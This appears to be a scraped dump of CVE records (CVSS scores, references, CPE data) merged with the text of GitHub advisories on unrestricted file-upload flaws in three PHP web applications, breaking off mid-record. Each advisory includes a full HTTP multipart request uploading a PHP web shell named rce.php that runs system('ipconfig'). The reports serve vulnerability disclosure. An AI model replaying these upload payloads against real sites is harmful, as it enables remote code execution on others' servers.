{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/26" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.263929" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.263929" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.332581" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.263929" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.263929" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.332581" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nikhil-bhalerao:open_source_clinic_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "31D19E63-4EB6-42AC-AA1B-C9E734140902", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/CveSecLook/cve/issues/26
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CveSecLook", "cve" ]
# SourceCodester Open Source Clinic Management System in PHP with Full Source Code 1.0 setting.php Unrestricted Upload # NAME OF AFFECTED PRODUCT(S) + Open Source Clinic Management System in PHP with Full Source Code ## Vendor Homepage + https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html # AFFECTED AND/OR FIXED VERSION(S) ## submitter + Cece Chen from Wuhan University ## Vulnerable File + setting.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip # PROBLEM TYPE ## Vulnerability Type + File upload ## Root Cause + The input obtained from line 23 of the "clinic full source code with database-0/source code/setting.php" file is used in line 26 of the "clinic full source code with database-0/source code/setting.php" file to determine the location of the file to be written, which may allow attackers to change or damage the content of the file, or create a brand new file. + ![1](https://github.com/CveSecLook/cve/assets/148504790/9de5d668-727a-4095-9718-9aca3cad2b93) ## Impact + Attackers can exploit this vulnerability for unrestricted uploads, and remote attacks may result in RCE. # DESCRIPTION + Cece Chen from Wuhan University found that the file upload operation was triggered in /source code/setting.php, and the _FAILES variable was used to receive the payload. After receiving the attack vector from a remote attacker, it will result in unrestricted uploads, and remote attacks may lead to RCE. # No verification is required to exploit this vulnerability # Vulnerability details and POC ## Payload + The picture I uploaded here is a photo of carrying a Trojan horse, but due to character confusion, I took a screenshot directly. + ![2](https://github.com/CveSecLook/cve/assets/148504790/02204f1f-d154-429d-b068-72221cf3539d) ``` POST /setting.php HTTP/1.1 Host: 192.168.31.212:8109 Content-Length: 1484 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.31.212:8109 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYptAOkpiBueYX716 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.31.212:8109/setting.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: s1591159628=lohvd5hnhcjtqckupc1ebb5224; PHPSESSID=mrpcs400nm7p9hmneirs8t9j06 Connection: close ------WebKitFormBoundaryYptAOkpiBueYX716 Content-Disposition: form-data; name="business_name" Mayuri K ------WebKitFormBoundaryYptAOkpiBueYX716 Content-Disposition: form-data; name="business_email" mayuri.infospace@gmail.com ------WebKitFormBoundaryYptAOkpiBueYX716 Content-Disposition: form-data; name="business_web" # ------WebKitFormBoundaryYptAOkpiBueYX716 Content-Disposition: form-data; name="portal_addr" # ------WebKitFormBoundaryYptAOkpiBueYX716 Content-Disposition: form-data; name="addr" <p>Maharashtra, India</p> ------WebKitFormBoundaryYptAOkpiBueYX716 Content-Disposition: form-data; name="curr_sym" $ ------WebKitFormBoundaryYptAOkpiBueYX716 Content-Disposition: form-data; name="curr_position" right ------WebKitFormBoundaryYptAOkpiBueYX716 Content-Disposition: form-data; name="front_end_en" 0 ------WebKitFormBoundaryYptAOkpiBueYX716 Content-Disposition: form-data; name="date_format" Y-m-d ------WebKitFormBoundaryYptAOkpiBueYX716 Content-Disposition: form-data; name="def_tax" 0.20 ------WebKitFormBoundaryYptAOkpiBueYX716 Content-Disposition: form-data; name="old_image" logo for hospital system.jpg ------WebKitFormBoundaryYptAOkpiBueYX716 Content-Disposition: form-data; name="logo"; filename="rce.php" Content-Type: image/jpeg <?php system("ipconfig"); ?> ------WebKitFormBoundaryYptAOkpiBueYX716 Content-Disposition: form-data; name="btn_web" ------WebKitFormBoundaryYptAOkpiBueYX716-- ``` ## Burp screenshot + ![3](https://github.com/CveSecLook/cve/assets/148504790/c1409cc4-425e-4468-bbd2-169acf2af254) + I successfully executed the PHP script on the terminal + ![4](https://github.com/CveSecLook/cve/assets/148504790/8259d906-3991-41b0-9b11-7122cf1ff67b)
SourceCodester Open Source Clinic Management System in PHP with Full Source Code 1.0 setting.php Unrestricted Upload
https://api.github.com/repos/CveSecLook/cve/issues/26/comments
0
2024-05-10T15:41:06Z
2024-05-10T15:41:07Z
https://github.com/CveSecLook/cve/issues/26
2,289,966,823
26
6,019
CVE-2024-4920
2024-05-16T00:15:08.563
A vulnerability was found in SourceCodester Online Discussion Forum Site 1.0. It has been rated as critical. This issue affects some unknown processing of the file registerH.php. The manipulation of the argument ima leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264455.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/27" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.264455" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.264455" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.333477" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/27" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.264455" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.264455" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.333477" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:razormist:online_discussion_forum_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1F9F37D-C115-4EC6-A1DD-FFB3869E79C0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/CveSecLook/cve/issues/27
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CveSecLook", "cve" ]
# SourceCodester Online Discussion Forum Site 1.0 registerH.php Unrestricted Upload # NAME OF AFFECTED PRODUCT(S) + Online Discussion Forum Site ## Vendor Homepage + https://www.sourcecodester.com/php/14234/complete-e-commerce-site-phpmysqli.html # AFFECTED AND/OR FIXED VERSION(S) ## submitter + Cece Chen from Wuhan University ## Vulnerable File + registerH.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/razormist/online-discussion-forum-site.zip # PROBLEM TYPE ## Vulnerability Type + File upload ## Root Cause + The input obtained from line 16 of the "registerH.php" file is used in line 20 of the "registerH.php" file to determine the location of the file to be written, which may allow attackers to change or damage the content of the file, or create a brand new file. + ![1](https://github.com/CveSecLook/cve/assets/148504790/41099964-f4bc-4f0a-99a8-e58903b2c8da) ## Impact + Attackers can exploit this vulnerability for unrestricted uploads, and remote attacks may result in RCE. # DESCRIPTION + Cece Chen from Wuhan University found that the file upload operation was triggered in registerH.php, and the _FAILES variable was used to receive the payload. After receiving the attack vector from a remote attacker, it will result in unrestricted uploads, and remote attacks may lead to RCE. # No verification is required to exploit this vulnerability # Vulnerability details and POC ## Payload + The picture I uploaded here is a photo of carrying a Trojan horse, but due to character confusion, I took a screenshot directly. + ![2](https://github.com/CveSecLook/cve/assets/148504790/78ac1e77-6f5f-4c30-a8c4-3befb82a5b82) ``` POST /registerH.php HTTP/1.1 Host: 192.168.31.212:8111 Content-Length: 1066 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.31.212:8111 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTZYA7xSBtyY1gMwx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.31.212:8111/register.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundaryTZYA7xSBtyY1gMwx Content-Disposition: form-data; name="u_name" 22 ------WebKitFormBoundaryTZYA7xSBtyY1gMwx Content-Disposition: form-data; name="f_name" 22 ------WebKitFormBoundaryTZYA7xSBtyY1gMwx Content-Disposition: form-data; name="pwd" 123456 ------WebKitFormBoundaryTZYA7xSBtyY1gMwx Content-Disposition: form-data; name="e_mail" 22@qq.com ------WebKitFormBoundaryTZYA7xSBtyY1gMwx Content-Disposition: form-data; name="gender" 1 ------WebKitFormBoundaryTZYA7xSBtyY1gMwx Content-Disposition: form-data; name="dob" 22/22/22 ------WebKitFormBoundaryTZYA7xSBtyY1gMwx Content-Disposition: form-data; name="ima"; filename="rce.php" Content-Type: image/jpeg <?php system("ipconfig"); ?> ------WebKitFormBoundaryTZYA7xSBtyY1gMwx Content-Disposition: form-data; name="add" 11 ------WebKitFormBoundaryTZYA7xSBtyY1gMwx Content-Disposition: form-data; name="sta" 11 ------WebKitFormBoundaryTZYA7xSBtyY1gMwx Content-Disposition: form-data; name="cou" 11 ------WebKitFormBoundaryTZYA7xSBtyY1gMwx-- ``` ## Burp screenshot + ![3](https://github.com/CveSecLook/cve/assets/148504790/681a6cec-5931-4a12-ab54-c464f65e605b) + I successfully executed the PHP script on the terminal + ![4](https://github.com/CveSecLook/cve/assets/148504790/f0ea1997-42c3-4101-a369-f8fd9047c879)
SourceCodester Online Discussion Forum Site 1.0 registerH.php Unrestricted Upload
https://api.github.com/repos/CveSecLook/cve/issues/27/comments
0
2024-05-13T16:22:30Z
2024-05-13T16:22:30Z
https://github.com/CveSecLook/cve/issues/27
2,293,275,185
27
6,021
CVE-2024-4923
2024-05-16T02:15:07.900
A vulnerability has been found in Codezips E-Commerce Site 1.0 and classified as critical. This vulnerability affects unknown code of the file admin/addproduct.php. The manipulation of the argument profilepic leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264460.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/polaris0x1/CVE/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.264460" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.264460" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.333874" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/polaris0x1/CVE/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.264460" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.264460" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.333874" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:codezips:e-commerce_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "448FA2B8-9265-4027-B054-7BCE8AD7278A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/polaris0x1/CVE/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "polaris0x1", "CVE" ]
# Codezips E-commerce Site Using PHP With Source Code 1.0 admin/addproduct.php Unrestricted Upload # NAME OF AFFECTED PRODUCT(S) + E-commerce Site Using PHP With Source Code ## Vendor Homepage + https://codezips.com/php/e-commerce-site-using-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + polaris0x1 ## Vulnerable File + admin/addproduct.php ## VERSION(S) + V1.0 ## Software Link + https://codeload.github.com/codezips/ecommerce-site-using-php/zip/master # PROBLEM TYPE ## Vulnerability Type + File upload ## Root Cause + The input obtained from line 38 of the "/admin/addproduct.php" file is used in line 57 of the "/admin/addproduct.php" file to determine the location of the file to be written, which may allow attackers to change or damage the content of the file, or create a brand new file. + ![1](https://github.com/polaris0x1/CVE/assets/167133866/86766550-12b6-4594-9278-920228aaa1c8) ## Impact + Attackers can exploit this vulnerability for unrestricted uploads, and remote attacks may result in RCE. # DESCRIPTION + polaris0x1 found that the file upload operation was triggered in admin/addproduct.php, and the _FAILES variable was used to receive the payload. After receiving the attack vector from a remote attacker, it will result in unrestricted uploads, and remote attacks may lead to RCE. # No verification is required to exploit this vulnerability # Vulnerability details and POC ## Payload + The picture I uploaded here is a photo of carrying a Trojan horse, but due to character confusion, I took a screenshot directly. + ![2](https://github.com/polaris0x1/CVE/assets/167133866/635ef12f-9c51-4118-9148-dabdbdaa7bd2) ``` POST /admin/addproduct.php HTTP/1.1 Host: 192.168.31.180:8201 Content-Length: 2958 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.31.180:8201 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryu9aV2G3ROxdMpbiR User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.31.180:8201/admin/addproduct.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=aco6iu4oiga2i57hcp6iif1ea0; admin_login=borsha%40gmail.com Connection: close ------WebKitFormBoundaryu9aV2G3ROxdMpbiR Content-Disposition: form-data; name="pname" 1 ------WebKitFormBoundaryu9aV2G3ROxdMpbiR Content-Disposition: form-data; name="price" 1 ------WebKitFormBoundaryu9aV2G3ROxdMpbiR Content-Disposition: form-data; name="available" 1 ------WebKitFormBoundaryu9aV2G3ROxdMpbiR Content-Disposition: form-data; name="descri" 1 ------WebKitFormBoundaryu9aV2G3ROxdMpbiR Content-Disposition: form-data; name="category" women ------WebKitFormBoundaryu9aV2G3ROxdMpbiR Content-Disposition: form-data; name="type" clothing ------WebKitFormBoundaryu9aV2G3ROxdMpbiR Content-Disposition: form-data; name="item" saree ------WebKitFormBoundaryu9aV2G3ROxdMpbiR Content-Disposition: form-data; name="code" 1 ------WebKitFormBoundaryu9aV2G3ROxdMpbiR Content-Disposition: form-data; name="profilepic"; filename="rce.php" Content-Type: image/jpeg <?php system("ipconfig"); ?> ------WebKitFormBoundaryu9aV2G3ROxdMpbiR Content-Disposition: form-data; name="signup" Add Product ------WebKitFormBoundaryu9aV2G3ROxdMpbiR-- ``` ## Burp screenshot + ![3](https://github.com/polaris0x1/CVE/assets/167133866/5c22c0ff-0941-4882-b56f-d9b19f81c03a) ## Uploading file name changes, it is speculated that it is a timestamp renaming mechanism + ![4](https://github.com/polaris0x1/CVE/assets/167133866/6d787287-3b6a-496a-9c36-b307654c7aaa) + ![5](https://github.com/polaris0x1/CVE/assets/167133866/d91108cb-2a9b-4f68-82e3-1fed480b8985) ## I successfully executed the PHP script on the terminal + ![6](https://github.com/polaris0x1/CVE/assets/167133866/edb3b136-42ee-4646-8a29-b40a23a057da)
Codezips E-commerce Site Using PHP With Source Code 1.0 admin/addproduct.php Unrestricted Upload
https://api.github.com/repos/ppp-src/CVE/issues/1/comments
0
2024-05-14T11:37:04Z
2024-05-14T11:37:04Z
https://github.com/ppp-src/CVE/issues/1
2,295,192,061
1
6,022
CVE-2024-4945
2024-05-16T05:15:52.187
A vulnerability was found in SourceCodester Best Courier Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file view_parcel.php. The manipulation of the argument id leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264480.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": 